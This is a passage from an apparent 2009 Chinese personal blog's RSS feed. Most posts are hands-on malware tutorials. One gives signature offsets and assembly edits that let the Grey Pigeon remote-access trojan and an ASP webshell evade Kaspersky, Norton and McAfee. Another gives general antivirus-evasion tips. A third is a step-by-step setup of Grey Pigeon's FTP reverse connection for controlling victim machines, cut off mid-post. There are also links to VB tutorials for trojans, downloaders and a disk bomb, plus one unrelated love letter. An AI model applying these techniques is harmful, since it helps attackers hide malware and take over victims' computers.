<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="http://feeds.qzone.qq.com/rss.xsl" version="1.0"?>
<rss version="2.0" xmlns:qz="http://qzone.qq.com">
<channel>
<title><![CDATA[暗小子]]></title>
<description><![CDATA[暗小子]]></description>
<link>http://648618852.qzone.qq.com</link>
<lastBuildDate>Tue, 24 Nov 2009 18:51:19 GMT</lastBuildDate>
<generator>Qzone</generator>
<language>zh-cn</language>
<copyright>Copyright (C), 2005-2008, Tencent Tech. Co., Ltd.</copyright>
<pubDate>Sun, 28 Jun 2009 16:54:47 GMT</pubDate>

<item>
<title><![CDATA[制作ASP网页木马]]></title>
<link>http://648618852.qzone.qq.com/blog/1246208087</link>
<description><![CDATA[<span style="font-size:32px;line-height:1.8em;"><span style="font-size:16px;line-height:1.8em;">2005年是免杀技术突飞猛进的一年，越来越多的人熟悉了简单的PE文件免杀操作。而杀毒软件也是在查杀方面下足了功夫，使得修改文件变得越来越困难。但是，无论定位和修改多么麻烦，只要杀软利用的是特征码扫描，PE文件就可以通过相对简单的特征码修改达到免杀。而CCL一直没有涉足的方面是脚本免杀，坛里也有朋友让我改进一下，因此最近给CCL加上了定位脚本特征码的功能，并对一款asp木马进行了测试，结果怎么样呢？ <br>    这里我选择了海阳顶端网ASP木马2006版。由于并不知道杀软是怎样定义脚本文件的特征码，所以我的操作与定位PE文件相同。杀软仍用大名鼎鼎Kaspersky。先查一下吧，卡巴报警发现Backdoor.ASP.Ace.aw。注意末尾的aw，这是杀软对同一个文件不同版本的特征码定义，有时我们需要运用定位过程中版本号的变化来确定特征码的位置。 <br>    首先假设将特征码定位器CCL设置成手动定位，生成文件200个，打开海洋的木马主文件2006.asp。这时弹出了定位范围选择窗口，由于脚本文件不是PE文件，因此没有分段，整个文件就是一个整体。如图1所示，段名为整个文件，段大小就是整个文件的大小。 <br><wbr /><a href="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=a703d3e3753de44a8054bdfcd5c2840d3d5b74f7339a404e54f1689616e0b6dbdaddb6f9b529e5913d5429794eded329698f99780943218475efdf4acb35ff259a4deaa136b895027bdfd04a858fdbc9b86d95cd" target="_blank"><img style="border:0;" src="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=a703d3e3753de44a8054bdfcd5c2840d3d5b74f7339a404e54f1689616e0b6dbdaddb6f9b529e5913d5429794eded329698f99780943218475efdf4acb35ff259a4deaa136b895027bdfd04a858fdbc9b86d95cd" /></a><wbr /> <br>screen.width-333)this.width=screen.width-333&quot; border=0&gt; <br><br>    直接点确定，对整个文件进行定位。生成文件完毕后对目标进行查杀，结果，只剩下一个文件没有被杀，OUT_00000000_000001C3，这说明当从偏移0开始1C3个字节的数据被填0时，该文件免杀。我们看一下这里是什么。 <br>代码: <br><wbr /><a href="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=a703d3e3753de44a8054bdfcd5c2840d51fb08a53f6e6a624d2939ab7fa43a2b4b8995024534a8061811e516a8ea771af9fadcec0a410a11bd3be9f3696db477b4dc2177604cd33d497dd2276a3db84614f91419" target="_blank"><img style="border:0;" src="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=a703d3e3753de44a8054bdfcd5c2840d51fb08a53f6e6a624d2939ab7fa43a2b4b8995024534a8061811e516a8ea771af9fadcec0a410a11bd3be9f3696db477b4dc2177604cd33d497dd2276a3db84614f91419" /></a><wbr /> <br><br>javascript</span><wbr />:resizepic(this) border=0&gt; <br>    我们将“文件上传成功”改为“上传成功”，保存后再检测。OK，免杀成功了。运行一下试试，海洋的各项功能正常。当然，文件上传成功后的提示已经变了。如图2。 <br><br><wbr /><a href="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=a703d3e3753de44a8054bdfcd5c2840dbd361f1886596f464b7cca94abdd3441f284d13080a7d3137dbf943ada49547169b89b4dc90910a85ca36f9c34946c67bb7ccebc7e53ecef07c27d17324d07e7727047f0" target="_blank"><img style="border:0;" src="http://b21.photo.store.qq.com/http_imgload.cgi?/rurl4_b=a703d3e3753de44a8054bdfcd5c2840dbd361f1886596f464b7cca94abdd3441f284d13080a7d3137dbf943ada49547169b89b4dc90910a85ca36f9c34946c67bb7ccebc7e53ecef07c27d17324d07e7727047f0" /></a><wbr /> <br><br>screen.width-333)this.width=screen.width-333&quot; border=0&gt; <br><br><br>    总结一下：卡巴对恶意脚本的定义仍是沿用特征码的方式，且明显没有PE文件的特征码定义那样复杂。希望杀软早日在检测方式上产生根本性的改变！ <br></span><wbr /><br><br></span><wbr /> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[648618852@qq.com(暗小子)]]></author>
<comments>http://648618852.qzone.qq.com/blog/1246208087#comment</comments>
<qz:effect>142606931</qz:effect>
<pubDate>Sun, 28 Jun 2009 16:54:47 GMT</pubDate>
<guid>http://648618852.qzone.qq.com/blog/1246208087</guid>
</item>

<item>
<title><![CDATA[灰鸽子改特征免杀麦咖啡和诺顿8.0企业版]]></title>
<link>http://648618852.qzone.qq.com/blog/1246207919</link>
<description><![CDATA[灰鸽子改特征免杀麦咖啡和诺顿8.0企业版 <br>今天难得被我在学校机房蹭到了机器，装了诺顿和麦咖啡。反正还没针对这两个杀毒软件做过免杀，所以干脆就改一下好了。 <br>定位过程就免了，给出特征码位置： <br>诺顿的：   起始偏移 000B9A4D   偏移大小 00000007 <br>麦咖啡：   只要修改000B28B8处就可完成免杀 <br><br>先生成一个服务端，接下来用C32ASM打开（用16进制），按Ctrl+G跳到000B9A4D，我们看到了一大段的字符串，这些应该是程序控件名及属性的定义，修改大小写后并不会影响程序的正常执行。选中包含000B9A4D_000B9A54在内的一段，点右键，选择“修改数据”，选择“大小写反转”，最后保存文件，再用诺顿8.0企业版（病毒库都已经更新今天）查杀，通过，测试上线成功。 <br><br>PS：从网上的资料来看，诺顿的特征码基本上是定位在字符串上，一般修改大小写就可完成免杀。 <br><br>接下来在刚才修改免杀的基础上，我们再来修改麦咖啡的特征码。 <br>用OC计算文件偏移000B28B8处的内存地址为004B9CB8，用OD加载鸽子服务端，按Ctrl+G跳转到004B9CB8处，看看该处的内容 <br><br>004B9CB8   4E         dec esi <br><br>这里是减法运算，我们来看看它附近的汇编代码。 <br><br>004B9CB0   4E           dec esi <br>004B9CB1   0049 00       add byte ptr ds:[ecx],cl <br>004B9CB4   43           inc ebx <br>004B9CB5   004F 00       add byte ptr ds:[edi],cl <br>004B9CB8   4E           dec esi <br>004B9CB9   0000         add byte ptr ds:[eax],al <br><br>各个寄存器相互并不影响，也不存在堆栈和出栈操作，我们要做的是改变004B9CB8处的汇编代码，这样也就改变了特征码，最简单的方法就是将004B9CB8处的代码写到程序后面的0区域，然后用JMP指令来完成跳转。不过这里不需要这么做，如果将004B9CB5和004B9CB8处的代码交换一下，改成如下的形式 <br><br>004B9CB5   4E           dec esi <br>004B9CB8   004F 00       add byte ptr ds:[edi],cl <br><br>很明显原来004B9CB8处的代码换成了004B9CB5处的，而004B9CB5处的则换成了004B9CB8处的代码，交换顺序后，保存文件。用麦咖啡查杀已经通过，测试上线成功。 <br><br>最后就是用Resource Hacker等资源编辑工具删除hacker资源，将修改后的服务端文件命名为CServer.dat覆盖到鸽子的Cache目录下。 <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[648618852@qq.com(暗小子)]]></author>
<comments>http://648618852.qzone.qq.com/blog/1246207919#comment</comments>
<qz:effect>142606930</qz:effect>
<pubDate>Sun, 28 Jun 2009 16:51:59 GMT</pubDate>
<guid>http://648618852.qzone.qq.com/blog/1246207919</guid>
</item>

<item>
<title><![CDATA[分享木马的免杀技术经验]]></title>
<link>http://648618852.qzone.qq.com/blog/1245395315</link>
<description><![CDATA[分享木马的免杀技术经验 <br>木马免杀,在国内应该起源于05年吧.从那时单一特征码到现在复合特征码,杀毒软件从无主动防御到有主动防御.免杀技术越来越难.但是万变不离其宗--改特征码.到现在一些辅助软件的行为查杀. <br><br>以下讲解都是以远程控制软件为例(这里补充一个概念,木马的反弹技术,就是服务端主动连接客户端.何谓主动连接呢,你只要把客户端软件在本机上开启后,中马的机子会主动连接上你的那个软件,而不必你去找他的IP,再与他连接,这样省去了不少麻烦) <br><br>因为现在的主动防御太强悍,尤其是卡巴,瑞星的主动防御是基于特征码,所以很容易过.选远控软件的时候应该选一个本身就过杀软的,如PCSHARE,iRaT+Classic,gh0st等等,我个人觉得这几个软件都不错,而且免杀容易. <br><br>行为查杀:大多数的木马有默认的释放路径,而且安装好后有几个专用名词,如灰鸽子安装好后,就用&quot;灰鸽子安装完毕&quot;,&quot;黑防鸽子&quot;安装好后有&quot;黑防专版&quot;等字样,这些都是作为行为查杀木马的特征.配置时候把路径改掉,配置好后用C32ASM把里面的字符找到后替换掉就可以了. <br><br>最关键的我还是认为是特征码,也许大多数的人认为是主动防御.因为从我用马的经验来说,像PCshare,iRaT+Classic等,只要改了特征码后,主动照过.因为这些软件本身就过杀软的主防.讲一下我改特征码的经验吧: <br><br>1,定位出特征码后,不要急着改特征码,应该先看看前面与后面的,我定位PCSHARE的时候定位出system.sys（小数点是被杀的，也就是特征码），而我把小数点前面的system改成大写后就过那款杀毒软件了。这就说，不要定位到哪里，就改到哪里。 <br><br>2,定位到CAll时，应该试试这样：例，定位到call 12345678,这样一个，你试试改成 call 12345677，就是减1，这种方法很有用 <br><br>3.定位到PE头时，应该PE头移位，我不详细讲，这个网上看看方法，很简单的，只是简单的计算一下，移位一下。第二种方法，我听群里朋友说，但自己还没有试过，就是用北斗加一下壳，然后再脱壳，这样可以免杀， <br><br>4,定位到输入表时，也是相应的移位，这个网上方法也很多。因为是浅谈嘛，所以不详细说，只是提示一下，你在查免杀方法的同时，会学到很多 <br><br>5,第五是加一减一法，如果定位到数字或者其它什么符号时，加一减一试试，这个我也试过，有时候挺有用的 <br><br>6,先加一个壳，再定位特征码，这样能减少特征码的修改。 <br><br>7.跳转法。找个零区域，或者自己插入一个更佳，把代码移到零区域，这是一种常用的方法 <br><br>8.对付卡巴，花指令很有效的，花指令如何写呢，首先花指令就是一堆废话，没有用的，你惟一要做的就是维持堆栈平衡，不然要出错的。 <br><br>9,学习免杀应该懂一些十六进制工具，汇编工具，也应该懂一些汇编，其它改多了就好。推荐大家去下具的网址：www.pediy.com(这是一个大大有名的网站，看雪论坛），还有甲壳虫www.jksing.com/bbs里面有很多的免杀资料还会不定时的公布一些免费的DAT文件。 <br><br>&lt;SCRIPT language=javascript <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[648618852@qq.com(暗小子)]]></author>
<comments>http://648618852.qzone.qq.com/blog/1245395315#comment</comments>
<qz:effect>142606930</qz:effect>
<pubDate>Fri, 19 Jun 2009 07:08:35 GMT</pubDate>
<guid>http://648618852.qzone.qq.com/blog/1245395315</guid>
</item>

<item>
<title><![CDATA[VB编程教程全]]></title>
<link>http://648618852.qzone.qq.com/blog/1245074523</link>
<description><![CDATA[VB编程中窗体事件教程:<a href="http://dx.honkbase.com/dh/2009/2/19/1.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/2/19/1.rar</span><wbr /></a><wbr /> <br><br>vb子类处理制作安全密码文本框:<a href="http://dx.honkbase.com/dh/2009/2/15/2.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/2/15/2.rar</span><wbr /></a><wbr /> <br><br>用vb做踩雷游戏教程:<a href="http://dx.honkbase.com/dh/2009/2/28/3.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/2/28/3.rar</span><wbr /></a><wbr /> <br><br>vb打造墙纸自动更换工具:<a href="http://dx.honkbase.com/dh/2009/3/3/4.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/3/3/4.rar</span><wbr /></a><wbr /> <br><br>VB仿冲击波病毒演示教程:<a href="http://dx.honkbase.com/dh/2009/2/3/5.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/2/3/5.rar</span><wbr /></a><wbr /> <br><br>恶作剧VB-API囚禁鼠标教程:<a href="http://dx.honkbase.com/dh/2009/3/4/7.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/3/4/7.rar</span><wbr /></a><wbr /> <br><br>VB打造CF图标点亮工具教程:<a href="http://dx.honkbase.com/dh/2009/2/6/2.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/2/6/2.rar</span><wbr /></a><wbr /> <br><br>VB仿冲击波病毒演示教程:<a href="http://dx.honkbase.com/dh/2009/2/3/5.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/2/3/5.rar</span><wbr /></a><wbr /> <br><br>VB6制作QQ空间查看器教程:<a href="http://dx.honkbase.com/dh/2009/2/3/4.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/2/3/4.rar</span><wbr /></a><wbr />   <br><br>VB制作硬盘炸弹教程:<a href="http://dx.honkbase.com/dh/2009/2/1/5.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/2/1/5.rar</span><wbr /></a><wbr />   <br><br>用VB做FTP木马教程:<a href="http://dx.honkbase.com/dh/2009/2/1/1.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/2/1/1.rar</span><wbr /></a><wbr /> <br><br>VB重启验证之QQ踩空间大王4.0:<a href="http://dx.honkbase.com/dh/2009/1/28/4.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/1/28/4.rar</span><wbr /></a><wbr /> <br><br>VB之API教程:<a href="http://dx.honkbase.com/dh/2009/1/20/4.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/1/20/4.rar</span><wbr /></a><wbr /> <br><br>用VB打造恶搞小软件教程:<a href="http://dx.honkbase.com/dh/2009/1/7/7.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/1/7/7.rar</span><wbr /></a><wbr /> <br><br>VB编写下载者教程:<a href="http://dx.honkbase.com/dh/2009/1/7/5.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/1/7/5.rar</span><wbr /></a><wbr />   <br><br>VB制作密码查看器教程:<a href="http://dx.honkbase.com/dh/2009/1/7/4.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/1/7/4.rar</span><wbr /></a><wbr /> <br><br>VB编写关闭任意程序的程序:<a href="http://dx.honkbase.com/dh/2009/1/2/6.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2009/1/2/6.rar</span><wbr /></a><wbr /> <br><br>VB打造专用记事本教程:<a href="http://dx.honkbase.com/dh/2008/12/28/7.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2008/12/28/7.rar</span><wbr /></a><wbr /> <br><br>vb无控件获取IP教程:<a href="http://dx.honkbase.com/dh/2008/12/16/6.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2008/12/16/6.rar</span><wbr /></a><wbr /> <br><br>两招搞定VB自校验:<a href="http://dx.honkbase.com/dh/2008/12/23/13.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2008/12/23/13.rar</span><wbr /></a><wbr /> <br>   <br>VB打造免杀穿墙下载者:<a href="http://dx.honkbase.com/dh/2008/12/16/5.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2008/12/16/5.rar</span><wbr /></a><wbr /> <br><br>VB写粉碎机教程:<a href="http://dx.honkbase.com/dh/2008/12/9/11.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2008/12/9/11.rar</span><wbr /></a><wbr /> <br><br>VB挂机锁制作教程:<a href="http://dx.honkbase.com/dh/2008/11/22/8.rar" target="_blank"><span style="color:#0070af;line-height:1.8em;">http://dx.honkbase.com/dh/2008/11/22/8.rar</span><wbr /></a><wbr /> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[648618852@qq.com(暗小子)]]></author>
<comments>http://648618852.qzone.qq.com/blog/1245074523#comment</comments>
<qz:effect>142606930</qz:effect>
<pubDate>Mon, 15 Jun 2009 14:02:03 GMT</pubDate>
<guid>http://648618852.qzone.qq.com/blog/1245074523</guid>
</item>

<item>
<title><![CDATA[听了你能不感动吗_老公，我走了_伤感QQ音乐]]></title>
<link>http://648618852.qzone.qq.com/blog/1244006942</link>
<description><![CDATA[<div style="text-align:center;">老公：对不起，我终于狠下心来和你说离婚了。 </div><br>　　一直以来我都是个懦弱的女人。我用尽心力的守着我门的婚姻，为你烧你爱吃的菜，为了买你喜欢的CD，为你把一切都弄得很好，给了你我所能给的幸福。而我从未和你提过任何要求，我怕你觉得我烦。可现在我想通了，相恋再久的感情都敌不过几小时的一见钟情。 <br><br>　　第一次看到你和她的照片是在音乐网站上，第一次见到她是在你和他离开的酒店门口，第一次听你提起她是在我们结婚3周年纪念晚会上......那真是一个美丽的女孩。 <br><br>　　我偷看了你给她写的邮件，里面的每一句话真的好甜蜜，好感人。我看着看着就哭了，我骗自己，这是你写给我的，你永远是爱我的，你怎么可能和别人爱得那么深呢？是啊！你没有提离婚，我怎么敢说，我怕说了就真的，永远永远都没有你了。 <br><br>　　老公，我真的很爱你，很爱这个家。所以你不说，我也什么都不问。只是在你睡了以后慢慢的哭。你知道吗？我想谢谢你，谢谢你陪了我那么多年，我知道你很爱她，就象我爱着你那样。你没说过离婚，我已经很庆幸了，至少你还是回家陪我，会吃着我做的饭菜，傻傻的笑。至少你还记得回家给我一个拥抱，记得我的生日！我觉得够了，真的。我爱着你，包容着她。我以为我们可以就这样相安无事的永远相处下去。直到你昨晚和我讲了一个故事。 <br><br>　　你说：我有一个朋友，他已经结婚6年了。他有个很好的太太，一直以来他都爱着他的太太，可4年前他遇到了一个美丽的女孩。女孩对他很好，给了他太太所没有的激情。于是他们恋爱了，偷偷摸摸却又热烈的爱着。女孩很懂事，和他在一起那么久从来没有提过结婚之类的事。他依旧爱着太太，只是那已经是属于2个女人的爱了。他不会抛弃他的太太，因为太太对他太好了，好得找不到分手的理由，找不到伤害她的借口。可现在女孩怀孕了。女孩和他提出了结婚。女孩跟了他4年，把女人最美好的东西都给了他，他没办法拒绝女孩，可又无法抛弃爱他的妻子。 <br><br>　　故事到这就结束了，你问我：你说他该怎么办？ <br><br>　　我没有说话。我知道这是你和她之间的故事。这是你最无奈的选择。 <br><br>　　昨晚你睡觉之后，我在旁边看着你，看着你好看的脸。看着你熟睡的样子，你睡得真甜。我吻了你，在你身上小心的留下几百个吻，我知道这是最后一次了。宝宝，我的泪一滴一滴的落在你胸口，慢慢化开。一滴一滴的落在了我碎掉的心上。 <br><br>　　宝宝。我走了。我知道我的离开才是最好的结局。我不在你身边，自己要好好照顾自己。我把家里收拾干净了。饭在电饭煲里，回来以后记得自己热热吃了，这是最后一次给你做饭了。记得不要因为工作常常饿着，对身体不好，还有你有胃病，别和朋友出去喝酒，少吸点烟。我帮你定了1年的牛奶，他们会直接送到家里的，记得要热过才可以喝。你想买的CD我也买了，就放在电脑桌上。还有什么？对了，这个家里的东西我什么都没带走，除了你第一次送给我的礼物，那只绒线小熊，我已经习惯抱着它睡觉了。以后它可以陪着我，抱着它我会感觉到你的。 <br><br>　　我走了，离开的时候心里很痛，我们住了6年的房子，我和它说再见，我守了6年的家，我和它说再见。我爱了那么多年的你，我和你说：祝福！ <br><br>　　老公，我走了以后你要好好爱她，知道吗？不要在爱情里伤害任何人了。一定要对她很好很好，就象我对你那样。帮我吻你们的孩子，我想他一定会很漂亮的。告诉他，我会祝福他的。 <br><br>　　我依旧爱着你，只是从今天开始一切与你无关！...... <br><div style="text-align:center;"><object codeBase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0" height="100" width="410" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" name="musicFlash**" id="musicFlash0" src="http://imgcache.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" ubb="466627765|1|http&amp;#58;//www&amp;#46;cxqq&amp;#46;net/links/e943bb4c&amp;#45;4fff&amp;#45;11de&amp;#45;9dfb&amp;#45;0014221b798a/&amp;#46;mp3|原创歌曲|0|原创歌曲"><param value="http://imgcache.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" name="movie" /><param value="#ffffff" name="bgColor" /><param value="showall" name="scale" /><param value="transparent" name="wmode" /><param value="true" name="menu" /><param value="always" name="allowScriptAccess" /></object><wbr /></div><div style="text-align:center;">播放时候请把背景音乐关掉谢谢 </div> <!--v:3.2--> ]]></description>
<category><![CDATA[情感随笔]]></category>
<author><![CDATA[648618852@qq.com(暗小子)]]></author>
<comments>http://648618852.qzone.qq.com/blog/1244006942#comment</comments>
<qz:effect>142623250</qz:effect>
<pubDate>Wed, 03 Jun 2009 05:29:02 GMT</pubDate>
<guid>http://648618852.qzone.qq.com/blog/1244006942</guid>
</item>

<item>
<title><![CDATA[外网灰鸽子FTP上线图]]></title>
<link>http://648618852.qzone.qq.com/blog/1233742913</link>
<description><![CDATA[首先，得申请一个免费的FTP<a href="http://idc.77169.com/" target="_blank"><span style="color:#0000ff;line-height:1.8em;">空间</span><wbr /></a><wbr />，我用的是www2.5944.net的，登陆进去。                     <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411000636.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411000636.jpg" target="_blank"><img style="width:453px;height:171px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411000636.jpg" /></a><wbr /></a><wbr /> <br>                        <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411030045.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411030045.jpg" target="_blank"><img style="width:433px;height:206px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411030045.jpg" /></a><wbr /></a><wbr /> <br>　　大家看到二级<a href="http://idc.77169.com/" target="_blank"><span style="color:#0000ff;line-height:1.8em;">域名</span><wbr /></a><wbr />了没，这个就是你的免费<a href="http://idc.77169.com/" target="_blank"><span style="color:#0000ff;line-height:1.8em;">域名</span><wbr /></a><wbr />，复制它，很有用。 <br>　　然后往下拉：找到上传账号：如图： <br>                          <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411044512.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411044512.jpg" target="_blank"><img style="width:407px;height:172px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411044512.jpg" /></a><wbr /></a><wbr /> <br>　　然后到浏览器的地址栏里面粘贴你的<a href="http://idc.77169.com/" target="_blank"><span style="color:#0000ff;line-height:1.8em;">域名</span><wbr /></a><wbr />，注意，前面要加入FTP://，如图： <br>                          <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411065378.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411065378.jpg" target="_blank"><img style="width:408px;height:120px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411065378.jpg" /></a><wbr /></a><wbr /> <br>　　接下来就到：，用户名输入你的FTP账号，密码就是FTP密码： <br>                          <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411082044.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411082044.jpg" target="_blank"><img style="width:421px;height:274px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411082044.jpg" /></a><wbr /></a><wbr /> <br>　　成功登陆后就看到： <br>                                                     <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411093948.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411093948.jpg" target="_blank"><img style="width:278px;height:101px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411093948.jpg" /></a><wbr /></a><wbr /> <br>　　进入wwwroot里面就这两个，我们不管它 <br>                                                 <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411103037.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411103037.jpg" target="_blank"><img style="width:170px;height:82px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411103037.jpg" /></a><wbr /></a><wbr /> <br>　　切换到桌面，建立一个ip.txt文档，注意，后缀一定是txt： <br>                                                        <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411114443.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411114443.jpg" target="_blank"><img style="width:133px;height:93px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411114443.jpg" /></a><wbr /></a><wbr /> <br>　　然后我们把ip.txt拖进来： <br>                                 <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411125076.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411125076.jpg" target="_blank"><img style="width:383px;height:239px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411125076.jpg" /></a><wbr /></a><wbr /> <br>　　好了 完成一半了,呵呵 <br>　　下面把IE关了吧(必须)。打开<a href="http://www.77169.com/LOGO/UploadAdPic/200712/hgz/index.html" target="_blank"><span style="color:#0000ff;line-height:1.8em;">鸽子</span><wbr /></a><wbr />，点自动上线<a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411134440.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411134440.jpg" target="_blank"><img style="width:81px;height:43px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411134440.jpg" /></a><wbr /></a><wbr />打开后 <br>                          <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411144808.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411144808.jpg" target="_blank"><img style="width:428px;height:245px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411144808.jpg" /></a><wbr /></a><wbr /> <br>　　FTP服务器:就是你的<a href="http://idc.77169.com/" target="_blank"><span style="color:#0000ff;line-height:1.8em;">域名</span><wbr /></a><wbr />，注意这里只填<a href="http://idc.77169.com/" target="_blank"><span style="color:#0000ff;line-height:1.8em;">域名</span><wbr /></a><wbr />，前面没ftp，也没http，后面也什么都没有，不要填错， <br>　　端口，默认就是21 <br>　　用户名就是你的FTP账号，没忘吧? <br>　　密码和确认密码是ftp密码 <br>　　连接类型，就默认pasv <br>存放ip的文件：这里注意了，这里写的是ip.txt在你的域名下的存放路径，我的是/wwwroot/ftp/ip.txt，wwwroot就是根目录，这个按照你<a href="http://idc.77169.com/" target="_blank"><span style="color:#0000ff;line-height:1.8em;">空间</span><wbr /></a><wbr />里的根目录写，这个后面的ftp是我在根目录下建立了一个文件夹的名字是ftp，你们如果没建立就不用写，而这个ip.txt就是前面我们拖进去的，你们按照教程做的话就填/wwwroot/ip.txt。 <br>　　Ip文件内容，就填你的 外网ip：8000，就可以了， <br>　　点击更新ip到ftp，看成功了没。 <br>　　接下来，我们乘热打铁，配置服务器端，就是点<a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411160262.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411160262.jpg" target="_blank"><img style="width:100px;height:46px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411160262.jpg" /></a><wbr /></a><wbr /> <br>　　进入如图界面 <br>                        <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411165942.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411165942.jpg" target="_blank"><img style="width:382px;height:243px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411165942.jpg" /></a><wbr /></a><wbr />   <br>　　好，我们接着看，首先是：ip通知http访问地址、这里 <br>　　因为我们前面做的是ftp上线，所以这里就填格式为： <br>　　http：//你的域名/ip.txt <br>　　大家注意，这里的http：//是必需的，然后域名是以.com之类的结尾的，不要把根目录wwwroot弄进来，，，我的域名后有个/ftp还是前面介绍过的，因为我建立了一个文件夹，所以写，你们没建立文件夹的话就不用写，最后的ip.txt是必须的，大家注意! <br>　　上线图像自选， <br>　　上线分组，上线备注，这个都不影响上线的，自己写不写都行， <br>　　连接密码是连接肉鸡时用的，不设置的话，连接时就不需要密码，这些都不影响<a href="http://www.77169.com/LOGO/UploadAdPic/200712/hgz/index.html" target="_blank"><span style="color:#0000ff;line-height:1.8em;">鸽子</span><wbr /></a><wbr />上线。 <br>　　然后保存路径，这个就看你要把生成的服务器保存到哪了，不多说了。 <br>　　大家看上面选项，还有安装选项，点他 <br>                            <a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411181758.jpg" target="_blank"><wbr /><a href="http://hack.77169.com/UploadFiles_8057/200810/2008101411181758.jpg" target="_blank"><img style="width:377px;height:261px;border:0;" src="http://hack.77169.com/UploadFiles_8057/200810/2008101411181758.jpg" /></a><wbr /></a><wbr /> <br>　　第一个是安装路径，这个是服务端在肉机上运行后，在肉鸡上的安装路径，这个大家可以改，大家喜好了，默认也行，但改要注意的是最后的后缀必须是.exe结尾的。 <br>　　程序图标：这个是生成<a 